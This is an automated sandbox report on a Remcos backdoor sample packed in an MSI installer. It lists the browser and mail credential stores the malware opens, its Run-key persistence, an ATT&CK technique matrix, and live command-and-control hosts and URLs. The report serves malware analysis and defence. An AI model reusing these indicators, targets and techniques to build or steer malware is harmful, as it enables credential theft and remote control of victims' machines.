                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\settings\main
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\startupCache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 6316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 716, type: MEMORYSTR
                  Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                  Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                  Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                  Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                  Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2968, type: MEMORYSTR

                  Remote Access Functionality

                  Source: C:\Users\user\task.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-RNN6CM
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 6316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 1272, type: MEMORYSTR
                  Source: C:\Users\user\task.exeCode function: cmd.exe22_2_000657D6
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DF8E0 bind,listen,WSAGetLastError,closesocket,8_2_6C8DF8E0
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE7F8E0 bind,listen,WSAGetLastError,closesocket,22_2_6FE7F8E0
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information1
                  Scripting
                  1
                  Replication Through Removable Media
                  11
                  Windows Management Instrumentation
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  12
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Extra Window Memory Injection
                  1
                  Deobfuscate/Decode Files or Information
                  131
                  Input Capture
                  11
                  Peripheral Device Discovery
                  Remote Desktop Protocol11
                  Data from Local System
                  22
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Access Token Manipulation
                  2
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  1
                  Account Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Windows Service
                  2
                  Software Packing
                  3
                  Credentials In Files
                  1
                  System Service Discovery
                  Distributed Component Object Model131
                  Input Capture
                  1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Services File Permissions Weakness
                  512
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets15
                  File and Directory Discovery
                  SSH3
                  Clipboard Data
                  2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Registry Run Keys / Startup Folder
                  1
                  File Deletion
                  Cached Domain Credentials1310
                  System Information Discovery
                  VNCGUI Input Capture13
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Services File Permissions Weakness
                  1
                  Extra Window Memory Injection
                  DCSync351
                  Security Software Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                  Masquerading
                  Proc Filesystem51
                  Virtualization/Sandbox Evasion
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadow4
                  Process Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Access Token Manipulation
                  Network Sniffing1
                  Application Window Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd512
                  Process Injection
                  Input Capture1
                  System Owner/User Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Services File Permissions Weakness
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Behavior Graph ID: 1560070, Sample: wE1inOhJA5.msi, Startdate: 21/11/2024, Architecture: WINDOWS, Score: 100

                  Source | Detection | Scanner | Label | Link
                  wE1inOhJA5.msi | 45% | ReversingLabs | Win32.Backdoor.Remcos |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\bce5c9c7fb0eb5498f5eb0ff4df1bd89.tmp | 100% | Avira | BAT/Runner.wekvp |
                  C:\Users\user\apps.bat | 100% | Avira | BAT/Runner.wekvp |
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\67a1ae3c4a36f34f89fd14e4fff5e74c.tmp | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\75aedfde5bde214c9f1dda9d9e9a381f.tmp | 29% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\87377860be1e204a95d069480a67ac12.tmp | 67% | ReversingLabs | Win32.Adware.RedCap |
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\g2m.dll (copy) | 29% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe (copy) | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\your_package_name.dll (copy) | 67% | ReversingLabs | Win32.Adware.RedCap |
                  C:\Users\user\g2m.dll | 29% | ReversingLabs | |
                  C:\Users\user\task.exe | 0% | ReversingLabs | |
                  C:\Windows\Installer\MSI509A.tmp | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  rm.anonbaba.net | 100% | Avira URL Cloud | malware |
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txna | 0% | Avira URL Cloud | safe |
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnas | 0% | Avira URL Cloud | safe |
                  http://127.0 | 0% | Avira URL Cloud | safe |
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnaymb | 0% | Avira URL Cloud | safe |
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnakernelbasentdllkernel32GetProcessMitigati | 0% | Avira URL Cloud | safe |
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnax | 0% | Avira URL Cloud | safe |
                  http://www.imvu.coma | 0% | Avira URL Cloud | safe |
                  http://127.01: | 0% | Avira URL Cloud | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  ntp.nict.jp | 61.205.120.130 | true | false | | high
                  chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high
                  rm.anonbaba.net | 179.43.171.197 | true | true | | unknown
                  geoplugin.net | 178.237.33.50 | true | false | | high
                  ntp1.net.berkeley.edu | 169.229.128.134 | true | false | | unknown
                  ntp.time.in.ua | 62.149.0.30 | true | false | | high
                  time-a-g.nist.gov | 129.6.15.28 | true | false | | high
                  ts1.aco.net | 193.171.23.163 | true | false | | unknown
                  time.windows.com | unknown | unknown | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txna | true | Avira URL Cloud: safe | unknown
                  rm.anonbaba.net | true | Avira URL Cloud: malware | unknown
                  http://geoplugin.net/json.gp | false | | high
                  Name | Source | Malicious | Antivirus Detection | Reputation
                                      http://geoplugin.net/json.gp$task.exe, 00000016.00000003.1640544536.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650331166.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647273159.0000000000871000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648907336.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642454762.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648293959.0000000000871000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642187022.0000000000874000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641987804.0000000000870000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648139673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649617657.0000000000874000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1638859407.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652161168.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641701441.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1651088954.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1640814728.000000000086C000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646658676.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1640250134.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646278220.0000000000869000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1645514022.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 
IP | Domain | Country | ASN | ASN Name | Malicious
179.43.171.196 | unknown | Panama | 51852 | PLI-ASCH | true
62.149.0.30 | ntp.time.in.ua | Ukraine | 15497 | COLOCALLInternetDataCenterColoCALLUA | false
169.229.128.134 | ntp1.net.berkeley.edu | United States | 25 | UCBUS | false
129.6.15.28 | time-a-g.nist.gov | United States | 49 | US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS | false
193.171.23.163 | ts1.aco.net | Austria | 1853 | ACONETACOnetBackboneAT | false
179.43.171.197 | rm.anonbaba.net | Panama | 51852 | PLI-ASCH | true
162.159.61.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
61.205.120.130 | ntp.nict.jp | Japan | 17511 | OPTAGEOPTAGEIncJP | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560070
Start date and time: 2024-11-21 11:25:33 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 45
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: wE1inOhJA5.msi (renamed because original name is a hash value)
Original Sample Name: ff389718792f877fbdabe5cb02a1b3d5de5be988f9b5690250ffdf3409f04000.msi
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.evad.winMSI@70/148@12/12
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 166
• Number of non-executed functions: 219
Cookbook Comments:
• Found application associated with file extension: .msi
• Close Viewer
• Override analysis time to 119996.6473 for current running targets taking high CPU consumption
• Override analysis time to 239993.2946 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.20, 17.253.52.125, 17.253.14.251, 17.253.14.125, 20.101.57.9, 158.220.97.17, 144.76.59.37, 85.220.190.246, 195.201.137.97, 142.250.74.195, 142.250.181.238, 142.250.110.84, 13.107.42.16, 142.250.185.142, 13.107.21.239, 204.79.197.239, 13.107.6.158
• Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, twc.trafficmanager.net, clientservices.googleapis.com, clients2.google.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, time.g.aaplimg.com, l-0007.l-msedge.net, config.edge.skype.com, pool.ntp.org, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, time.apple.com, onedsblobprdwus15.westus.cloudapp.azure.com, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, l-0007.config.skype.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, business.bing.com, clients.l.google.com, dual-a-0036.a-msedge.net
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: wE1inOhJA5.msi
Time | Type | Description
05:26:49 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
05:27:26 | API Interceptor | 4187475x Sleep call for process: task.exe modified
05:27:43 | API Interceptor | 1x Sleep call for process: wmplayer.exe modified
10:26:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run apps C:\Users\user\apps.bat
10:26:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run apps C:\Users\user\apps.bat
                                                                                                                                                  y99ZI1Kjg8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    QP6s4u5SZ8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      178.237.33.50ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      caec7ddf6889590d999d7ca1b76373b60a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 179.43.171.196
                                                                                                                                                      UGcjMkPWwW.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 179.43.171.196
                                                                                                                                                      XAhzDHAVZ2.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 179.43.171.196
                                                                                                                                                      TctqdRX5Wq.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 179.43.171.196
                                                                                                                                                      g753nr4GI9.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 179.43.171.196
                                                                                                                                                      msvcp110.dllGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 179.43.171.196
                                                                                                                                                      qsKo.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 179.43.171.196
                                                                                                                                                      DCF368HPtv.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 179.43.171.196
                                                                                                                                                      ji2OQQH0ei.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 179.43.171.196
                                                                                                                                                      zaD1vaze6V.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 179.43.171.196
Match: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\67a1ae3c4a36f34f89fd14e4fff5e74c.tmp
Associated Sample Name / URL | Detection | Threat Name
file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader
FpiUD4nYpj.exe | malicious | LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT
e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe | malicious | LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT
7Y18r(14).exe | malicious | LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):65536
                                                                                                                                                              Entropy (8bit):1.144542314276748
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:F0IjAITD0BU/HJ6jaz75guIdzuiFIZ24IO8q+i:+8dTwBU/QjIIzuiFIY4IO8G
                                                                                                                                                              MD5:06BE0F5CDF95FB3BF4894239496AC721
                                                                                                                                                              SHA1:490977DB5BBDCE5C0C093594528A4016ED474352
                                                                                                                                                              SHA-256:A099429C4F93AD4B86BC37015706E622178860A5DD07A0298A481847BA32F650
                                                                                                                                                              SHA-512:2E4CB351226E829DF72F7D494095B1C3A875446824D02F2FACBC4CB2D7A4008AAA4BAEF052A5621923149DB39C5F4B535E7E96B7A0A278CFCFB3427F32C68E36
                                                                                                                                                              Malicious:false
Preview:Version=1..EventType=APPCRASH..EventTime=133766583999557111..ReportType=2..Consent=1..UploadTime=133766584011588350..ReportStatus=524384..ReportIdentifier=19be0b05-7ace-4d33-8611-c7043441e604..IntegratorReportIdentifier=c428ed6a-759a-4162-b095-6d393910ec4b..Wow64Host=34404..Wow64Guest=332..NsAppName=task.exe..OriginalFilename=G2M.exe..AppSessionGuid=00001ec8-0001-0014-1a75-cad7ff3bdb01..TargetAppId=W:0006ad86d5e1ca7ea4aa733781e5dd7e4fa300000904!0000dcc2dcb26c1649887f1d5ae557a000b5fe34bb98!task.
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Thu Nov 21 10:26:40 2024, 0x1205a4 type
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):214721
                                                                                                                                                              Entropy (8bit):3.518304425674418
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:UreP9CjBMjOASpe0wrCDstTJo6syCRuBojRwpN4uE2aOESVXJ8LTgeNkt:OScnpXW9o6sTHm4uEqEySLTgYk
                                                                                                                                                              MD5:F94A7A94F68B2908845C028877187376
                                                                                                                                                              SHA1:D9191B45A5A6734ACCCEABC037D2CAB9FFE5E85C
                                                                                                                                                              SHA-256:7B4CD6E244177E849246B1C315871F02A83A251E88E91859E88BB15EF1F058E4
                                                                                                                                                              SHA-512:CF506CA434D34E727E3668F9F0191E6ADA1A402B4E9C21AA3A9DECC5C59342F3763DA6B8336F63A3F3DBC2B3A1C45340FB014B4A38673E940F40746EAF630674
                                                                                                                                                              Malicious:false
Preview:MDMP minidump header (binary); readable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8318
                                                                                                                                                              Entropy (8bit):3.6973054201275812
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:R6l7wVeJbN6lG6YdP6cwgmfxSBqprF89b8pGysfdA0m:R6lXJx6k6Yl6cwgmfxSBt8pGxfk
                                                                                                                                                              MD5:68D0B2A1D55967FF97D0B284993D7C3E
                                                                                                                                                              SHA1:C01E6A472CEA4DDF20401C0782B8A85B94814F7E
                                                                                                                                                              SHA-256:5AFC3C791C355D4538F49D7BDBA37D6604A31EC2B43E9723A1D6CCCD473B553D
                                                                                                                                                              SHA-512:C4DD5AD1225DF2CEED57343F57F1C8233F62FE7CC30B43277FA69EB639755CA8FD09CBEB594D8C62A76CED2F02A10E544A3809117A3382233132E4C2546B0E8D
                                                                                                                                                              Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7880</Pi
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4656
                                                                                                                                                              Entropy (8bit):4.471646983310799
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:cvIwWl8zsaJg77aI961WpW8VYFYm8M4JFD0LBFs+q8x1o7mUyoE3aLd:uIjfoI7ME7VJJFQoeaByoEKLd
                                                                                                                                                              MD5:C58D015B56D54816EE712C86DBFC482C
                                                                                                                                                              SHA1:14F008978FB47C027FD1C74314FB66CE300F8034
                                                                                                                                                              SHA-256:EE22C18764EA7D58FAA83B0FB3792073C66BB8B9A1527DD941B8F173F5B7D72E
                                                                                                                                                              SHA-512:E8DA06EE1A5E117C99669C87C8584135558F8BE6C1167E1AA0F5BEEBC445FD9778A7E3A3169BB1786DB65D089A7A31B70E1AF99AD2DB5CD154FE5F67B42E4740
                                                                                                                                                              Malicious:false
